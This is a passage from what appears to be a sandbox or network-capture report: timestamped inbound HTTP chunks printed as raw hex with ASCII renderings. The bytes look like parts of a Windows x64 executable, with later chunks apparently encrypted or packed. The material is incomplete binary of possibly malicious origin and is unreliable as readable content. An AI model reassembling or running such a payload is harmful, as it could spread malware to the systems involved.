4000HEHM(H3DH]`HuhH}pHe0A_A^A]A\]@UATAUAVAWH`Hl$PH]@HuHH}PHCH3HEHc}`IELH~HI;x\|DuxEuHDpDLAd$(Hd$ 3LcsIHHHH;HH#=IH=w1H
2023-03-17 08:24:05 UTC	56	IN	Data Raw: e1 49 03 c1 66 48 0f 6e c8 66 0f 2f 25 75 da 00 00 0f 82 df 00 00 00 48 c1 e8 2c 66 0f eb 15 c3 d9 00 00 66 0f eb 0d bb d9 00 00 4c 8d 0d 34 eb 00 00 f2 0f 5c ca f2 41 0f 59 0c c1 66 0f 28 d1 66 0f 28 c1 4c 8d 0d fb da 00 00 f2 0f 10 1d 03 da 00 00 f2 0f 10 0d cb d9 00 00 f2 0f 59 da f2 0f 59 ca f2 0f 59 c2 66 0f 28 e0 f2 0f 58 1d d3 d9 00 00 f2 0f 58 0d 9b d9 00 00 f2 0f 59 e0 f2 0f 59 da f2 0f 59 c8 f2 0f 58 1d a7 d9 00 00 f2 0f 58 ca f2 0f 59 dc f2 0f 58 cb f2 0f 10 2d 13 d9 00 00 f2 0f 59 0d cb d8 00 00 f2 0f 59 ee f2 0f 5c e9 f2 41 0f 10 04 c1 48 8d 15 96 e2 00 00 f2 0f 10 14 c2 f2 0f 10 25 d9 d8 00 00 f2 0f 59 e6 f2 0f 58 c4 f2 0f 58 d5 f2 0f 58 c2 66 0f 6f 74 24 20 48 83 c4 58 c3 66 66 66 66 66 66 0f 1f 84 00 00 00 00 00 f2 0f 10 15 c8 d8 00 00 f2 Data Ascii: IfHnf/%uH,ffL4\AYf(f(LYYYf(XXYYYXXYX-YY\AH%YXXXfot$ HXffffff
2023-03-17 08:24:05 UTC	64	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:24:05 UTC	64	IN	Data Raw: 34 30 30 30 0d 0a cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 54 24 10 89 4c 24 08 48 81 ec 58 03 00 00 48 8b 05 e9 03 01 00 48 33 c4 48 89 84 24 40 03 00 00 48 c7 44 24 48 00 00 00 00 48 8d 05 46 d3 00 00 48 89 44 24 60 48 c7 44 24 68 00 00 00 00 48 c7 44 24 70 00 00 00 00 48 c7 44 24 50 00 00 00 00 48 c7 44 24 40 00 00 00 00 b8 08 00 00 00 48 6b c0 00 48 8d 0d 35 d3 00 00 48 89 8c 04 80 00 00 00 48 63 84 24 60 03 00 00 b9 08 00 00 00 48 6b c9 01 48 89 84 0c 80 00 00 00 b8 08 00 00 00 48 6b c0 02 48 c7 84 04 80 00 00 00 09 04 00 00 4c 8d 4c 24 58 41 b8 03 00 00 00 48 8d 94 24 80 00 00 00 48 8d 0d 35 f3 fe ff ff 15 4f 56 00 00 89 44 24 34 4c 8d 4c 24 40 4c 8d 44 24 50 48 8b 54 24 58 48 8d 0d 15 f3 fe ff ff 15 47 56 00 00 89 44 24 34 c7 44 24 28 Data Ascii: 4000HT$L$HXHH3H$@HD$HHFHD$`HD$hHD$pHD$PHD$@HkH5HHc$`HkHHkHLL$XAH$H5OVD$4LL$@LD$PHT$XHGVD$4D$(
2023-03-17 08:24:05 UTC	72	IN	Data Raw: c0 75 06 ff 15 b5 34 00 00 33 d2 33 c9 ff 15 d3 36 00 00 85 c0 75 06 ff 15 a1 34 00 00 33 d2 33 c9 ff 15 bf 36 00 00 85 c0 75 06 ff 15 8d 34 00 00 33 d2 33 c9 ff 15 ab 36 00 00 85 c0 75 06 ff 15 79 34 00 00 33 d2 33 c9 ff 15 97 36 00 00 85 c0 75 06 ff 15 65 34 00 00 33 d2 33 c9 ff 15 83 36 00 00 85 c0 75 06 ff 15 51 34 00 00 33 d2 33 c9 ff 15 6f 36 00 00 85 c0 75 06 ff 15 3d 34 00 00 33 d2 33 c9 ff 15 5b 36 00 00 85 c0 75 06 ff 15 29 34 00 00 33 d2 33 c9 ff 15 47 36 00 00 85 c0 75 06 ff 15 15 34 00 00 33 d2 33 c9 ff 15 33 36 00 00 85 c0 75 06 ff 15 01 34 00 00 33 d2 33 c9 ff 15 1f 36 00 00 85 c0 75 06 ff 15 ed 33 00 00 33 d2 33 c9 ff 15 0b 36 00 00 85 c0 75 06 ff 15 d9 33 00 00 33 d2 33 c9 ff 15 f7 35 00 00 85 c0 75 06 ff 15 c5 33 00 00 33 d2 33 c9 ff 15 Data Ascii: u4336u4336u4336uy4336ue4336uQ433o6u=433[6u)433G6u43336u4336u3336u3335u333
2023-03-17 08:24:05 UTC	80	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:24:06 UTC	80	IN	Data Raw: 34 30 30 30 0d 0a 48 8b 44 24 20 0f be 00 85 c0 74 58 8b 04 24 c1 e8 0d 8b 0c 24 c1 e1 13 0b c1 89 04 24 48 8b 44 24 20 0f be 00 83 f8 61 7c 11 48 8b 44 24 20 0f be 00 83 e8 20 89 44 24 04 eb 0c 48 8b 44 24 20 0f be 00 89 44 24 04 8b 44 24 04 8b 0c 24 03 c8 8b c1 89 04 24 48 8b 44 24 20 48 ff c0 48 89 44 24 20 eb 9c 8b 05 0e e1 00 00 8b 0c 24 03 c8 8b c1 89 04 24 8b 04 24 48 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 44 89 4c 24 20 4c 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 48 83 ec 58 41 b9 64 00 00 00 4c 8d 05 cb e0 00 00 ba 67 00 00 00 48 8b 4c 24 60 ff 15 13 16 00 00 41 b9 64 00 00 00 4c 8d 05 de df 00 00 ba 6d 00 00 00 48 8b 4c 24 60 ff 15 f6 15 00 00 48 8b 4c 24 60 e8 e4 bc ff ff 8b 54 24 78 48 8b 4c 24 60 e8 16 bc ff Data Ascii: 4000HD$ tX$$$HD$ a\|HD$ D$HD$ D$D$$$HD$ HHD$ $$$HDL$ LD$HT$HL$HXAdLgHL$`AdLmHL$`HL$`T$xHL$`
2023-03-17 08:24:06 UTC	88	IN	Data Raw: 00 00 00 00 40 3e 00 00 00 00 00 00 20 3f 18 2d 44 54 fb 21 e9 3f 00 00 00 00 80 84 1e 41 00 00 00 00 d0 12 73 41 ff ff ff ff ff ff ff 7f 00 00 00 00 00 00 f0 7f 00 00 00 00 00 00 f0 41 00 00 00 00 00 00 f0 bf 05 00 00 c0 0b 00 00 00 00 00 00 00 00 00 00 00 1d 00 00 c0 04 00 00 00 00 00 00 00 00 00 00 00 96 00 00 c0 04 00 00 00 00 00 00 00 00 00 00 00 8d 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 8e 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 8f 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 90 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 91 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 92 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 93 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 b4 02 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 b5 02 00 c0 08 00 00 00 00 Data Ascii: @> ?-DT!?AsAA
2023-03-17 08:24:06 UTC	96	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:24:06 UTC	96	IN	Data Raw: 34 30 30 30 0d 0a 03 04 00 00 00 00 00 00 30 a2 01 80 01 00 00 00 04 04 00 00 00 00 00 00 88 7e 01 80 01 00 00 00 05 04 00 00 00 00 00 00 40 a2 01 80 01 00 00 00 06 04 00 00 00 00 00 00 50 a2 01 80 01 00 00 00 07 04 00 00 00 00 00 00 60 a2 01 80 01 00 00 00 08 04 00 00 00 00 00 00 70 a2 01 80 01 00 00 00 09 04 00 00 00 00 00 00 f0 8a 01 80 01 00 00 00 0b 04 00 00 00 00 00 00 80 a2 01 80 01 00 00 00 0c 04 00 00 00 00 00 00 90 a2 01 80 01 00 00 00 0d 04 00 00 00 00 00 00 a0 a2 01 80 01 00 00 00 0e 04 00 00 00 00 00 00 b0 a2 01 80 01 00 00 00 0f 04 00 00 00 00 00 00 c0 a2 01 80 01 00 00 00 10 04 00 00 00 00 00 00 d0 a2 01 80 01 00 00 00 11 04 00 00 00 00 00 00 58 7e 01 80 01 00 00 00 12 04 00 00 00 00 00 00 78 7e 01 80 01 00 00 00 13 04 00 00 00 00 00 00 e0 Data Ascii: 40000~@P`pX~x~
2023-03-17 08:24:06 UTC	104	IN	Data Raw: 00 00 00 00 00 00 68 c1 01 80 01 00 00 00 56 00 00 00 00 00 00 00 a0 a0 01 80 01 00 00 00 15 00 00 00 00 00 00 00 78 c1 01 80 01 00 00 00 57 00 00 00 00 00 00 00 88 c1 01 80 01 00 00 00 98 00 00 00 00 00 00 00 98 c1 01 80 01 00 00 00 8c 00 00 00 00 00 00 00 a8 c1 01 80 01 00 00 00 9f 00 00 00 00 00 00 00 b8 c1 01 80 01 00 00 00 a8 00 00 00 00 00 00 00 a8 a0 01 80 01 00 00 00 16 00 00 00 00 00 00 00 c8 c1 01 80 01 00 00 00 58 00 00 00 00 00 00 00 b0 a0 01 80 01 00 00 00 17 00 00 00 00 00 00 00 d8 c1 01 80 01 00 00 00 59 00 00 00 00 00 00 00 d8 a1 01 80 01 00 00 00 3c 00 00 00 00 00 00 00 e8 c1 01 80 01 00 00 00 85 00 00 00 00 00 00 00 f8 c1 01 80 01 00 00 00 a7 00 00 00 00 00 00 00 08 c2 01 80 01 00 00 00 76 00 00 00 00 00 00 00 18 c2 01 80 01 00 00 00 9c Data Ascii: hVxWXY<v
2023-03-17 08:24:06 UTC	112	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:24:06 UTC	112	IN	Data Raw: 34 30 30 30 0d 0a b8 a6 4e fd 69 9c 3b 3e ab a4 5f 83 a5 6a 2b 3e d1 ed 0f 79 c3 cc 43 3e e0 4f 40 c4 4c c0 29 3e 9d d8 75 7a 4b 73 40 3e 12 16 e0 c4 04 44 1b 3e 94 48 ce c2 65 c5 40 3e cd 35 d9 41 14 c7 33 3e 4e 3b 6b 55 92 a4 72 3d 43 dc 41 03 09 fa 20 3e f4 d9 e3 09 70 8f 2e 3e 45 8a 04 8b f6 1b 4b 3e 56 a9 fa df 52 ee 3e 3e bd 65 e4 00 09 6b 45 3e 66 76 77 f5 9e 92 4d 3e 60 e2 37 86 a2 6e 48 3e f0 a2 0c f1 af 65 46 3e 74 ec 48 af fd 11 2f 3e c7 d1 a4 86 1b be 4c 3e 65 76 a8 fe 5b b0 25 3e 1d 4a 1a 0a c2 ce 41 3e 9f 9b 40 0a 5f cd 41 3e 70 50 26 c8 56 36 45 3e 60 22 28 35 d8 7e 37 3e d2 b9 40 30 bc 17 24 3e f2 ef 79 7b ef 8e 40 3e e9 57 dc 39 6f c7 4d 3e 57 f4 0c a7 93 04 4c 3e 0c a6 a5 ce d6 83 4a 3e ba 57 c5 0d 70 d6 30 3e 0a bd e8 12 6c c9 44 3e 15 Data Ascii: 4000Ni;>_j+>yC>O@L)>uzKs@>D>He@>5A3>N;kUr=CA >p.>EK>VR>>ekE>fvwM>`7nH>eF>tH/>L>ev[%>JA>@_A>pP&V6E>`"(5~7>@0$>y{@>W9oM>WL>J>Wp0>lD>
2023-03-17 08:24:06 UTC	120	IN	Data Raw: 00 00 01 00 00 00 91 de 00 00 ce de 00 00 6a 53 01 00 00 00 00 00 19 33 0b 00 25 34 22 00 19 01 1a 00 0e f0 0c e0 0a d0 08 c0 06 70 05 60 04 50 00 00 d0 f8 00 00 a8 c4 01 00 cb 00 00 00 94 d7 00 00 ff ff ff ff 19 2d 09 00 1b 54 90 02 1b 34 8e 02 1b 01 8a 02 0e e0 0c 70 0b 60 00 00 18 f7 00 00 40 14 00 00 19 31 0b 00 1f 54 96 02 1f 34 94 02 1f 01 8e 02 12 f0 10 e0 0e c0 0c 70 0b 60 00 00 18 f7 00 00 60 14 00 00 11 0a 04 00 0a 34 09 00 0a 52 06 70 84 2a 00 00 01 00 00 00 02 e2 00 00 81 e2 00 00 81 53 01 00 00 00 00 00 01 17 0a 00 17 54 0e 00 17 34 0d 00 17 52 13 f0 11 e0 0f d0 0d c0 0b 70 01 0e 02 00 0e 32 0a 30 01 18 06 00 18 54 07 00 18 34 06 00 18 32 14 60 01 04 01 00 04 02 00 00 01 09 01 00 09 42 00 00 01 10 06 00 10 64 09 00 10 34 08 00 10 52 0c 70 11 Data Ascii: jS3%4"p`P-T4p`@1T4p``4Rp*ST4Rp20T42`Bd4Rp
2023-03-17 08:24:06 UTC	128	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:24:06 UTC	128	IN	Data Raw: 34 30 30 30 0d 0a 66 40 00 00 7c ec 01 00 68 40 00 00 ee 40 00 00 54 eb 01 00 f0 40 00 00 7a 42 00 00 30 ec 01 00 7c 42 00 00 12 43 00 00 14 ea 01 00 14 43 00 00 01 44 00 00 b8 ec 01 00 04 44 00 00 8c 44 00 00 14 ea 01 00 bc 44 00 00 02 45 00 00 e4 e9 01 00 04 45 00 00 3b 45 00 00 e4 e9 01 00 50 45 00 00 68 45 00 00 c8 ed 01 00 70 45 00 00 71 45 00 00 cc ed 01 00 80 45 00 00 81 45 00 00 d0 ed 01 00 bc 45 00 00 0a 47 00 00 d4 ed 01 00 0c 47 00 00 51 47 00 00 e4 e9 01 00 54 47 00 00 9a 47 00 00 e4 e9 01 00 9c 47 00 00 e2 47 00 00 e4 e9 01 00 e4 47 00 00 35 48 00 00 54 eb 01 00 38 48 00 00 99 48 00 00 f0 ea 01 00 b0 48 00 00 f0 48 00 00 f0 ed 01 00 00 49 00 00 2a 49 00 00 f8 ed 01 00 30 49 00 00 56 49 00 00 00 ee 01 00 60 49 00 00 a7 49 00 00 08 ee 01 00 a8 Data Ascii: 4000f@\|h@@T@zB0\|BCCDDDDEE;EPEhEpEqEEEEGGQGTGGGGG5HT8HHHHI*I0IVI`II
2023-03-17 08:24:06 UTC	136	IN	Data Raw: e6 9b ca bb 3e 59 4f b6 31 2c 34 0c 05 c5 b4 6e 0e eb 04 78 f2 31 0e c3 ad 59 3c e3 75 5e dc 4e b4 89 d2 60 e2 4d 1e e5 40 05 5d 43 03 e0 cf 16 57 e2 20 26 f8 6e 0e 24 c1 43 35 1f 34 07 42 d0 79 17 b1 64 2e ed da b7 cc e3 1e 7f f2 d8 36 97 d8 63 3a be 01 14 ef 2e 1a 92 23 2b 71 e3 0c 3c c2 e3 89 e7 fd 3c 43 6f f1 44 2e 4b b5 3d 4c 44 3f 24 d3 ef 70 05 da 63 42 f0 01 2c 5f cc 65 39 54 6e 0e 29 c8 06 4a f5 04 07 92 1a a9 38 bb 64 2e cb 71 77 f4 27 14 5d ec 64 35 fb 16 59 3e cb 44 53 43 2e 1a 02 b6 6e 0e e3 34 3c 04 1a f5 d9 b7 1c 43 e1 75 16 96 07 4b 13 6a 62 6b b8 44 2d a7 5e d2 53 3a ff ef 3b 78 e0 28 46 c8 ca 5a a8 90 aa 36 be b0 91 3f d0 71 17 f1 44 2e 44 b5 3d 4c 45 74 b8 a6 ef 70 05 da 63 6a f0 01 2c 29 c8 65 39 be 5e 0e 40 e2 68 c3 f5 04 07 72 60 ac Data Ascii: >YO1,4nx1Y<u^N`M@]CW &n$C54Byd.6c:.#+q<<CoD.K=LD?$pcB,_e9Tn)J8d.qw']d5Y>DSC.n4<CuKjbkD-^S:;x(FZ6?qD.D=LEtpcj,)e9^@hr`
2023-03-17 08:24:06 UTC	144	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:24:06 UTC	144	IN	Data Raw: 34 30 30 30 0d 0a cf 4a 14 52 1e c1 76 72 ea 75 71 1b 3a bf c4 ad 00 27 cd 16 38 23 e6 fd 1f 76 b2 ae 01 10 7d f7 9d 48 fb 1d 18 48 d3 4d 51 42 f3 0c 17 46 4d e1 61 64 f2 3e 77 0e 84 48 44 53 ef 2f 41 71 c7 3d 71 62 f9 0a 81 b6 97 30 b7 80 fd 0c 14 69 5a c3 40 6c 7b a5 72 58 b6 ef 61 5e 1b d1 a7 f6 ae 55 a1 3f 41 71 85 6b 71 62 41 82 51 50 39 7b bd 2d 18 20 de f8 02 5a f3 0c 17 22 c5 58 61 64 b4 0e 77 66 d2 ab 03 3c e9 0f 41 79 38 aa 35 46 01 e9 46 8b 8e b9 58 7d 7c 6f b1 55 75 02 92 1c f3 92 e0 44 45 24 be 3e 77 6e ad 10 37 52 28 e0 2e 11 77 a0 a1 eb 09 6b be 3f 79 f1 74 75 b7 23 3c a8 19 72 f3 0c 17 22 99 64 61 64 b4 3e 77 66 10 d5 44 53 a9 1f 41 79 9e 86 7b 62 ca 0f 11 34 99 7d 1a 5b 3c 20 b9 23 19 c9 31 f3 4d 60 6b 0f 71 64 c6 75 2c 64 4d 38 54 1b 30 Data Ascii: 4000JRvruq:'8#v}HHMQBFMad>wHDS/Aq=qb0iZ@l{rXa^U?AqkqbAQP9{- Z"Xadwf<Ay85FFX}\|oUuDE$>wn7R(.wk?ytu#<r"dad>wfDSAy{b4}[< #1M`kqdu,dM8T0
2023-03-17 08:24:06 UTC	152	IN	Data Raw: 61 47 0c da 74 4f 55 71 b6 6f 55 4a 09 ce b0 e4 72 78 3c 11 b5 2c 14 01 b9 23 bc 48 33 a5 ee d8 66 64 35 9c 41 26 45 bc c9 8b 2f 6b 65 81 b6 a3 f9 ea 0d c8 fe 83 90 b9 d6 5f b5 fd e8 26 51 42 b5 cd eb 65 6b 00 58 9d 35 7a d2 a3 9d 30 44 53 17 a5 65 39 be 9e a9 65 41 43 21 91 72 78 fb 1d 18 38 84 4d 51 42 b5 3c 17 32 86 6e b7 ff b4 0e 77 76 e3 61 9f c8 ef ee 8d 3e 3f 2b 2c 87 41 43 b4 f1 99 7f 3c 59 73 2c cf de 90 e7 dc 4f 33 62 64 81 d4 8c 32 7a 53 ad 0b ed 50 94 ad 8b 62 39 3f b3 b1 62 41 c2 80 94 76 78 3c dc da bb b5 a0 d4 a2 33 48 33 a8 02 00 61 e5 80 9a 54 26 45 64 3d 8d ad e0 e0 d9 38 2b 71 26 ca c6 dd 73 71 78 b7 0d 18 38 bb ac 89 45 34 48 ba 26 4f 20 89 3b 03 7a 53 9e 52 77 44 53 c1 0d 98 c6 c0 ec f4 ba 46 43 35 74 b1 78 3c e1 35 a3 0d ac da cf ec Data Ascii: aGtOUqoUJrx<,#H3fd5A&E/ke_&QBekX5z0DSe9eAC!rx8MQB<2nwva>?+,AC<Ys,O3bd2zSPb9?bAvx<3H3aT&Ed=8+q&sqx8E4H&O ;zSRwDSFC5tx<5
2023-03-17 08:24:06 UTC	160	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:24:06 UTC	160	IN	Data Raw: 34 30 30 30 0d 0a 57 46 1f 04 0a 20 11 0e 17 af 01 13 30 eb 0d 22 f7 1d be 5f 55 16 59 9f cb be b6 3c 18 29 f2 99 30 21 da 0e 10 38 c4 83 40 ca b0 8d 36 b0 92 cf 47 be 08 77 58 ea 29 1d 4f 44 04 4c c9 c2 41 50 01 16 a8 70 b4 af 75 49 89 d8 34 48 f2 0f 03 02 e0 11 5d 16 1b c3 28 b6 01 3b 4f d2 9a c6 be 5e 19 cc 39 a8 58 b3 34 18 e3 92 3c 68 f1 44 31 4b f5 25 53 68 00 45 01 3b bc 3f 33 e7 20 57 40 d2 5d 0b 85 5e 6f 29 fa 27 21 07 be 31 19 f3 68 7d 4c e3 7c 05 25 cb 70 6c 13 8a f5 16 61 64 f2 3f 3b 55 20 37 44 eb 2d 2a 75 3d b4 66 19 2e ca 8c c2 95 5a b2 ed b0 3f a2 f1 c8 57 cb 79 20 f2 0f 03 09 a0 01 5d 7e 92 43 2d 35 c5 26 40 6e 20 39 3f ec 34 02 20 b0 35 74 1a 3d 5c 14 b5 2d 50 a0 24 22 cd e5 2f 2c ea 45 01 8c bd 85 ac a7 00 57 8e 73 d7 94 e4 4c 5f 3f 93 Data Ascii: 4000WF 0"_UY<)0!8@6GwX)ODLAPpuI4H](;O^9X4<hD1K%ShE;?3 W@]^o)'!1h}L\|%plad?;U 7D-*u=f.Z?Wy ]~C-5&@n 9?4 5t=\-P$"/,EWsL_?
2023-03-17 08:24:06 UTC	168	IN	Data Raw: 92 d8 14 e1 a0 8b 42 89 f4 9d 74 f1 70 7d 0c e9 7c 05 61 2d 95 2e 8f e3 1f 24 51 49 c7 10 ef ad 01 13 74 da 6c 4f 55 b2 73 0f 39 e9 45 67 06 bc 30 f1 75 5d fb 2c 14 11 08 43 34 48 f2 06 4f 30 62 e5 71 5e 63 db d5 37 44 d2 5c 4f 55 be e3 27 71 e9 05 67 05 fd 35 5c 0c 11 bf ac 18 e2 d8 16 10 58 ba 2e 4f 08 34 2c be 96 1b a5 a9 47 83 16 f0 de ac 39 3f 18 b1 2a c8 06 e9 fd 34 9c fb 1c 24 38 45 21 51 c3 71 50 e2 0f 6b 00 ea 21 2d f7 5f 66 46 fe cd 1e 30 00 20 21 64 a2 34 7a c0 06 2d 1b d9 78 3c d8 49 70 44 5e 2b a4 bf 0d 2b eb 2e ec a6 21 2d ae 40 26 45 f6 29 4b 24 ea 20 21 15 81 8e 9d c0 06 2d 54 6e 87 c3 d2 79 70 bd 2d 11 83 d5 4b ba 2f 73 81 14 7c 92 d2 09 55 ce 72 5c da 6d 93 a2 7c 27 26 10 62 41 c2 40 6c eb 3d 56 4d b7 25 28 99 1e ae f0 06 c4 83 aa ea 62 Data Ascii: Btp}\|a-.$QItlOUs9Eg0u],C4HO0bq^c7D\OU'qg5\X.O4,G9?*4$8E!QqPk!-_fF0 !d4z-x<IpD^++.!-@&E)K$ !-Tnyp-K/s\|Ur\m\|'&bA@l=VM%(b
2023-03-17 08:24:06 UTC	176	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:24:06 UTC	176	IN	Data Raw: 34 30 30 30 0d 0a 70 8e 94 63 5d 32 2d 53 28 e0 28 21 7e a0 b1 95 a0 fb aa 66 95 51 fd b3 3e e1 65 39 da 0f 2c bf d2 49 a1 41 ea a4 e4 93 50 ec 84 de 42 da 65 73 e4 4c 27 44 6d 1c e0 82 50 6c 7c f9 49 41 70 09 8e 39 da 0f 2c c1 7e ba ac 45 79 c3 3c 7a 53 ad 08 2f b3 b2 f9 81 ec 6c 27 aa 04 7a 62 8e b4 68 f0 0d 24 20 76 c1 fa aa 14 5a bd 0d d3 a5 2e 18 f4 4c 35 7a 92 43 5d 32 2f 16 30 02 ec 7c 27 aa 3c 7a 3d a3 71 c7 f0 3d 24 40 ff 68 30 a0 24 5a b0 74 ba b7 e0 45 79 ed 70 9e 94 63 5d 35 d7 53 28 ea 28 21 e5 94 c6 9f c0 06 2d 18 7d 87 c3 d8 79 70 af 14 ae bd b5 3d 2b e7 fd a6 47 ef 70 62 da 63 99 f0 01 83 28 6a 65 39 fe 46 a1 69 c0 06 e5 f9 6c 78 3c d8 49 b8 b1 3c 51 42 f3 0d 2b f5 44 00 61 e5 78 62 2a 3a 1f ac 2f 16 30 45 ec 7c 27 aa 34 7a 61 04 ca 8b b0 Data Ascii: 4000pc]2-S((!~fQ>e9,IAPBesL'DmPl\|IAp9,~Ey<zS/l'zbh$ vZ.L5zC]2/0\|'<z=q=$@h0$ZtEypc]5S((!-}yp=+Gpbc(je9Filx<I<QB+Daxb*:/0E\|'4za
2023-03-17 08:24:06 UTC	184	IN	Data Raw: a0 fb e8 33 01 67 fd b3 3f e1 a5 99 52 42 34 c3 be da 68 00 61 93 d4 51 99 9e 08 a6 8b e9 f9 82 66 f3 fe c2 74 eb cc fb 36 74 71 f9 b9 e1 3f 68 30 45 4c 42 34 c9 86 da 68 00 61 35 b1 79 53 e1 c0 87 47 53 28 21 c1 39 3f aa c4 d2 42 43 35 25 b1 47 e9 d2 b1 d8 33 21 51 b5 d5 63 f9 b3 82 03 ab a5 dc 7c da ab f5 34 44 53 a9 de d5 3a 3f 2b 3f 9c aa 41 71 ff fc c8 3f 59 3c e3 a5 99 52 42 34 c3 be a2 68 00 61 8c c7 3f ac d9 ce ff cf d6 e0 68 65 39 14 e3 17 e1 3d 0f 55 28 04 7d 5a d0 48 24 50 e6 d4 82 37 48 33 85 85 00 61 28 b8 3e 77 46 c4 82 84 50 28 6b 89 05 38 32 f0 e7 81 40 35 74 55 dd c3 a6 bd dd f0 22 51 42 95 eb 34 7b ac 85 d1 67 35 7a e6 a9 45 37 2f d6 98 68 65 39 60 a2 f4 d2 42 43 35 f5 f4 c8 3f 59 3c 4e 87 21 51 c3 81 f8 30 62 6b 71 3a 4e e9 f1 de 96 46 Data Ascii: 3g?RB4haQft6tq?h0ELB4ha5ySGS(!9?BC5%G3!Qc\|4DS:?+?Aq?Y<RB4ha?he9=U(}ZH$P7H3a(>wFP(k82@5tU"QB4{g5zE7/he9`BC5?Y<N!Q0bkq:NF
2023-03-17 08:24:06 UTC	192	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:24:06 UTC	192	IN	Data Raw: 34 30 30 30 0d 0a fe 78 e2 ba 8c 3a f5 ea 98 64 c8 0e 42 f5 04 0f df 3e d9 81 bb 64 26 cb 71 5f f4 27 1c 76 0f 64 35 c2 f6 67 5f 93 cf 1e 5f 9c 84 12 f5 fa 98 61 8b 82 dc 71 f8 35 4b d8 49 1f e1 42 a8 da bf 0d 44 eb 2e 2b a6 21 42 d0 07 26 45 f6 29 24 25 ea 28 4e ca b4 85 8c c0 36 42 ea a5 58 c6 d2 79 1f b9 64 62 85 71 3f fd 45 6b 00 20 ef f4 f1 1e 51 b2 d6 85 b9 2c e2 30 4e be 5e 06 5c 7f 03 dd ff 34 0f b5 1c 3f af 75 56 fc ae 34 48 b2 27 1c 26 a4 9b ca bb 3e 51 46 f6 29 24 2c ea 10 4e 46 6b 4c 74 ca 06 42 fd 34 6b fb 1c 4b 80 ff 21 51 03 bf 89 b8 2f 1c f7 80 a5 df 7e da 73 32 5c 01 24 5c e2 20 4e be 6e 06 50 01 bc ca f5 04 0f 7a 29 a5 f6 bb 64 26 cb 71 4f f4 27 1c bf 34 64 35 3b d8 e7 c4 42 33 32 9e d4 cb b8 4a 5c 34 3e ab 8e b4 31 06 e9 90 59 3c e9 45 Data Ascii: 4000x:dB>d&q_'vd5g__aq5KIBD.+!B&E)$%(N6BXydbq?Ek Q,0N^\4?uV4H'&>QF)$,NFkLtB4kK!Q/~s2\$\ NnPz)d&qO'4d5;B32J\4>1Y<E
2023-03-17 08:24:06 UTC	200	IN	Data Raw: 3c 56 b8 c1 34 21 51 7f 40 08 33 62 64 84 21 66 35 7a 6e 5f ad 37 44 5c ac 40 67 39 3f 16 83 8d 41 43 3a f1 0d 7c 3c 59 fb 2d 33 a6 97 42 34 23 76 61 40 89 24 67 8d 73 98 1b c8 b6 01 50 96 87 9a c6 be 6e 72 f2 d1 bc ca f5 34 7b bf b3 3c 68 b1 54 52 3c f4 69 33 a5 2e ff 99 25 35 7a d2 63 ba c1 b7 53 28 aa 00 c6 36 aa 34 9d 25 7c 35 74 f0 3d c3 23 66 97 cf a0 24 bd ea 3d 58 60 ac 45 6a 18 c1 7a 53 ad 08 3c b3 b2 e9 81 60 b0 6a 20 f0 17 4a 1a 31 d5 e5 f9 49 52 53 68 91 b5 96 07 3b cd 03 62 6b 8b 24 6b b8 76 d3 af 08 38 c5 26 27 31 8b 38 3f ec 34 99 18 53 35 74 f0 3d c7 9b 83 68 30 a0 1c b9 cb 3f ac ad aa 65 9a 60 b4 0f a8 d4 cb c0 bd 94 6d 78 14 77 3f 2b f0 2f 52 df db 13 76 f9 49 4a 49 35 57 26 96 07 c3 eb 6b 62 6b 6b 24 93 7f f3 16 d1 fd fe 06 45 9a e0 28 Data Ascii: <V4!Q@3bd!f5zn_7D\@g9?AC:\|<Y-3B4#va@$gsPnr4{<hTR<i3.%5zcS(64%\|5t=#f$=X`EjzS<`j J1IRSh;bk$kv8&'18?4S5t=h0?e`mxw?+/RvIJI5W&kbkk$E(
2023-03-17 08:24:06 UTC	208	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:24:06 UTC	208	IN	Data Raw: 34 30 30 30 0d 0a e3 a0 f4 22 40 43 35 fd f4 38 3d 59 3c 20 bd 24 2d 1a 34 48 7b eb ee 98 61 64 35 bd d6 66 44 37 44 5d 67 6b 65 b8 8a 6b 70 62 41 34 3b 1c 3a b9 91 19 3d 68 30 23 90 ef 74 49 33 62 66 81 ec 24 34 7a 53 93 a8 c0 f2 d2 9d 2b 64 39 3f ba 8e 95 f7 c8 b0 34 70 78 3c d0 b9 28 31 21 51 0a b9 4d b3 79 94 ff 29 ed b0 7a 52 26 45 7f c9 56 1e af 9a c6 77 a2 35 46 21 84 b0 34 70 78 3c 14 0a 68 30 e0 fc 02 35 48 33 6f e8 b5 21 65 35 7a 36 ad c0 77 45 53 28 e2 e0 79 3e 2b 71 a5 c4 03 34 74 71 0e 94 59 3c e9 bd 61 50 42 34 8f 77 2a 53 c1 c4 24 34 7a 53 29 c4 82 04 52 28 6b 01 b9 44 5d fa e7 01 42 35 74 f8 fd 7c 58 3c 68 78 ac 54 b3 2f 49 33 2a e2 45 31 2c b8 7f 65 31 45 37 0c da 6d 83 2d b4 3a cc 00 62 41 0b bc 31 f9 30 b1 5c 5c 86 cf de 19 cb 70 6c 73 Data Ascii: 4000"@C58=Y< $-4H{ad5fD7D]gkekpbA4;:=h0#tI3bf$4zS+d9?4px<(1!QMy)zR&EVw5F!4px<h05H3o!e5z6wES(y>+q4tqY<aPB4wS$4zS)R(kD]B5t\|X<hxT/I3E1,e1E7m-:bA10\\pls
